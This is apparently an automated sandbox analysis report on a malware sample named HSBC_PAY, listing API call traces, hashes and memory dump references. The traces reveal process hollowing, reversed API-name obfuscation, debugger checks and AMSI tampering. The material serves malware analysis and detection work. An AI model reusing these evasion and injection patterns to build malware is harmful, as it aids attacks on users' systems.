                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CheckConnectionInternet
                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                    • API String ID: 3847983778-3852638603
                                                                    • Opcode ID: 6db8389c8ffd38ec8a9ceb3f98bddee75860b414fc2c1c1a71a1d88ac785044b
                                                                    • Instruction ID: f34f380d97ca99b661de43d5bc9e0ac6f3d19293a2687343bf3639d78251d375
                                                                    • Opcode Fuzzy Hash: 6db8389c8ffd38ec8a9ceb3f98bddee75860b414fc2c1c1a71a1d88ac785044b
                                                                    • Instruction Fuzzy Hash: E9410D31B90209AFEF10FBA4DA80A9EB7FABF8D710F118426E041A7241DE75AD018F50

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 02A84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02A84EDA
                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DB96), ref: 02A9DB03
                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A9DB3D
                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A9DB6A
                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A9DB73
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                    • String ID:
                                                                    • API String ID: 3764614163-0
                                                                    • Opcode ID: 1f6acf7709b4dfdc908d70578e9ee0d67250f76e49a44d47c8b5a7b692a7f16b
                                                                    • Instruction ID: c6785edefae38ea10c18ef7103d76d5582e9e8bb3b15cfe836b1bb0244ba39c9
                                                                    • Opcode Fuzzy Hash: 1f6acf7709b4dfdc908d70578e9ee0d67250f76e49a44d47c8b5a7b692a7f16b
                                                                    • Instruction Fuzzy Hash: C221E071A80709BEEB20EAD5CD42F9EB7BDAB09B04F504061B600F71C0DBB46A048A55
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A98660
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                    • String ID: CreateProcessAsUserW$Kernel32
                                                                    • API String ID: 3130163322-2353454454
                                                                    • Opcode ID: aea004784a1957487711b7207a15564106e4b9f85be9ff53c2cbdb86a9cff94e
                                                                    • Instruction ID: b5a99885bfb199e80d9c1c874fbbbeaf354589863b65dd416d777f4c9e87dc89
                                                                    • Opcode Fuzzy Hash: aea004784a1957487711b7207a15564106e4b9f85be9ff53c2cbdb86a9cff94e
                                                                    • Instruction Fuzzy Hash: 8311D3B6640209BFDF80EEA9DD41F9B37EDEB0D710F514454BA08DB640CA38ED118B60
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A97A1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                    • API String ID: 4072585319-445027087
                                                                    • Opcode ID: f2f447b2300db62da6b85ac2409bcaf307679665876471f68350e450261a1f29
                                                                    • Instruction ID: 3defb2b34520f4f6f125b19322a2f76945fde47f51629097ce83b5226f32e2ed
                                                                    • Opcode Fuzzy Hash: f2f447b2300db62da6b85ac2409bcaf307679665876471f68350e450261a1f29
                                                                    • Instruction Fuzzy Hash: C611FA75690209AFEF00EFA5DD41E9EB7EEEB49710F514460B904D7A40DE34AA118B60
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A97A1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                    • API String ID: 4072585319-445027087
                                                                    • Opcode ID: 1ab6a63863019b1a0bb544748864e812433abee7cc0290277916f66570d4b1d0
                                                                    • Instruction ID: bf0ae21f37c2e29971fa790d367f7bf76b0507989e205ab5b3706688622bca8d
                                                                    • Opcode Fuzzy Hash: 1ab6a63863019b1a0bb544748864e812433abee7cc0290277916f66570d4b1d0
                                                                    • Instruction Fuzzy Hash: 37111BB5690209BFEF00EFA5DD81E9EBBEEEB4D710F514460B904D7A40DE34EA118B60
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A982BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                    • String ID: ntdll$yromeMlautriVdaeRtN
                                                                    • API String ID: 2521977463-737317276
                                                                    • Opcode ID: 448061d778f95a8477ad7b26b0675a525a418a0df147b980ca1efa67cc556532
                                                                    • Instruction ID: 3731d9d0ebed615faa801559a9f3163fd4b29391a907185aa4618161d2524d4a
                                                                    • Opcode Fuzzy Hash: 448061d778f95a8477ad7b26b0675a525a418a0df147b980ca1efa67cc556532
                                                                    • Instruction Fuzzy Hash: 82012975680209AFEF40EFA9D941E9EBBEEEB4D710F914460F504D7640DE38ED118B64
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A97D6C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                    • String ID: Ntdll$yromeMlautriVetirW
                                                                    • API String ID: 2719805696-3542721025
                                                                    • Opcode ID: 45f2eb0ff4faf45a7f7b70f4577bc6a923ca5ad4f98dba754d9f0c69bc6dbc7c
                                                                    • Instruction ID: 7853b71ab72d62899ab2e2eba8f4b3ca1d3b08408479cd24a0e38c0c236e919b
                                                                    • Opcode Fuzzy Hash: 45f2eb0ff4faf45a7f7b70f4577bc6a923ca5ad4f98dba754d9f0c69bc6dbc7c
                                                                    • Instruction Fuzzy Hash: 990117B4690209AFEF40EF99DD41EAABBEDEB4D710F914460B404D7A80DE34AD118F64
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02A98521
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                    • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                    • API String ID: 3503870465-2520021413
                                                                    • Opcode ID: 011e4fcca9a203745fe44255e1b017c13aa658bd023b777acbb76020484ad677
                                                                    • Instruction ID: 177f68ac971dfb242642cafd4b566c759cffb27aa1c00eb2171a67c2ddb339a2
                                                                    • Opcode Fuzzy Hash: 011e4fcca9a203745fe44255e1b017c13aa658bd023b777acbb76020484ad677
                                                                    • Instruction Fuzzy Hash: 80014F74680205BFEF00EBA5D941A5EBBEEEB4E710F914860B40497A00DE38AD158B60
                                                                    APIs
                                                                    • RtlInitUnicodeString.NTDLL(?,?), ref: 02A9DA64
                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DAB6), ref: 02A9DA7A
                                                                    • NtDeleteFile.NTDLL(?), ref: 02A9DA99
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                    • String ID:
                                                                    • API String ID: 1459852867-0
                                                                    • Opcode ID: 74f9540c5dc09c80b3f6db5d78571921c448c9b49d5247bfa23aa71cd6aa4c78
                                                                    • Instruction ID: 9775747570ff3c82d351c3ac9a0a37674f0a5ad85c0e030523016d6c3b59ecc4
                                                                    • Opcode Fuzzy Hash: 74f9540c5dc09c80b3f6db5d78571921c448c9b49d5247bfa23aa71cd6aa4c78
                                                                    • Instruction Fuzzy Hash: DB014F759887486EEF05F6A1CA81BDD7BF9AB45704F5040929200E7491EE74AB158B21
                                                                    APIs
                                                                      • Part of subcall function 02A84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02A84EDA
                                                                    • RtlInitUnicodeString.NTDLL(?,?), ref: 02A9DA64
                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DAB6), ref: 02A9DA7A
                                                                    • NtDeleteFile.NTDLL(?), ref: 02A9DA99
                                                                      • Part of subcall function 02A84C0C: SysFreeString.OLEAUT32(02A9E948), ref: 02A84C1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                    • String ID:
                                                                    • API String ID: 1694942484-0
                                                                    • Opcode ID: d93cba26bbefa38cec30dca8f3a9a99f5659d8ba16b9852fbecdf63fcbd269e7
                                                                    • Instruction ID: 0006efe037d669719be3d23e68fc3a40976d5932e3c140f156aad073328d0b2b
                                                                    • Opcode Fuzzy Hash: d93cba26bbefa38cec30dca8f3a9a99f5659d8ba16b9852fbecdf63fcbd269e7
                                                                    • Instruction Fuzzy Hash: D6012C71A44608BEEF10FAE1CE42FCEB7FDEB08700F904461A600E2580EE74AB148A60
                                                                    APIs
                                                                      • Part of subcall function 02A96CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02A96D39,?,?,?,00000000), ref: 02A96D19
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,02A96E2C,00000000,00000000,02A96DAB,?,00000000,02A96E1B), ref: 02A96D97
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFromInstanceProg
                                                                    • String ID:
                                                                    • API String ID: 2151042543-0
                                                                    • Opcode ID: c7679fc2627c795ccfecea4bdea04ad3557aa82d13d79320b294a0345198b70e
                                                                    • Instruction ID: f1f20d00f245162c69f1be4faaf86e8d0679f397fec367890808e023fbec19ca
                                                                    • Opcode Fuzzy Hash: c7679fc2627c795ccfecea4bdea04ad3557aa82d13d79320b294a0345198b70e
                                                                    • Instruction Fuzzy Hash: F801F231648704AEEB15EF66DD6286BBBEEEB49F10B520835F901D2640EE349910CC60
                                                                    APIs
                                                                    • InetIsOffline.URL(00000000,00000000,02AAAF99,?,?,?,000002F7,00000000,00000000), ref: 02A9ECA6
                                                                      • Part of subcall function 02A9881C: LoadLibraryA.KERNEL32(00000000,00000000,02A98903), ref: 02A98850
                                                                      • Part of subcall function 02A9881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02A98903), ref: 02A98860
                                                                      • Part of subcall function 02A9881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02A98879
                                                                      • Part of subcall function 02A9881C: FreeLibrary.KERNEL32(74AE0000,00000000,02AE1388,Function_000065D8,00000004,02AE1398,02AE1388,000186A3,00000040,02AE139C,74AE0000,00000000,00000000,00000000,00000000,02A98903), ref: 02A988E3
                                                                      • Part of subcall function 02A9EB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02A9EF90,UacInitialize,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanString), ref: 02A9EB92
                                                                      • Part of subcall function 02A9EB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02A9EBA4
                                                                      • Part of subcall function 02A9EBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02A9EBF8
                                                                      • Part of subcall function 02A9EBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02A9EC0A
                                                                      • Part of subcall function 02A9EBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02A9EC21
                                                                      • Part of subcall function 02A87E10: GetFileAttributesA.KERNEL32(00000000,?,02A9F8C4,ScanString,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanString,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,UacInitialize), ref: 02A87E1B
                                                                      • Part of subcall function 02A8C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02BD58C8,?,02A9FBF6,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession), ref: 02A8C2FB
                                                                      • Part of subcall function 02A9DBA8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DC78), ref: 02A9DBE3
                                                                      • Part of subcall function 02A9DBA8: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02A9DC78), ref: 02A9DC13
                                                                      • Part of subcall function 02A9DBA8: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02A9DC28
                                                                      • Part of subcall function 02A9DBA8: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02A9DC54
                                                                      • Part of subcall function 02A9DBA8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02A9DC5D
                                                                      • Part of subcall function 02A87E34: GetFileAttributesA.KERNEL32(00000000,?,02AA2A41,ScanString,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,Initialize), ref: 02A87E3F
                                                                      • Part of subcall function 02A87FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,02AA2BDF,OpenSession,02AE137C,02AAAFD0,ScanString,02AE137C,02AAAFD0,Initialize,02AE137C,02AAAFD0,ScanString,02AE137C,02AAAFD0), ref: 02A87FD5
                                                                      • Part of subcall function 02A9DAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DB96), ref: 02A9DB03
                                                                      • Part of subcall function 02A9DAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A9DB3D
                                                                      • Part of subcall function 02A9DAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A9DB6A
                                                                      • Part of subcall function 02A9DAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A9DB73
                                                                      • Part of subcall function 02A98798: LoadLibraryW.KERNEL32(bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize,02AE13A4,02A9A774,UacScan), ref: 02A987AC
                                                                      • Part of subcall function 02A98798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A987C6
                                                                      • Part of subcall function 02A98798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize), ref: 02A98802
                                                                      • Part of subcall function 02A98704: LoadLibraryW.KERNEL32(amsi), ref: 02A9870D
                                                                      • Part of subcall function 02A98704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02A9876C
                                                                    • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,02AAB328), ref: 02AA49AF
                                                                      • Part of subcall function 02A9DA3C: RtlInitUnicodeString.NTDLL(?,?), ref: 02A9DA64
                                                                      • Part of subcall function 02A9DA3C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DAB6), ref: 02A9DA7A
                                                                      • Part of subcall function 02A9DA3C: NtDeleteFile.NTDLL(?), ref: 02A9DA99
                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 02AA4BAF
                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 02AA4C05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
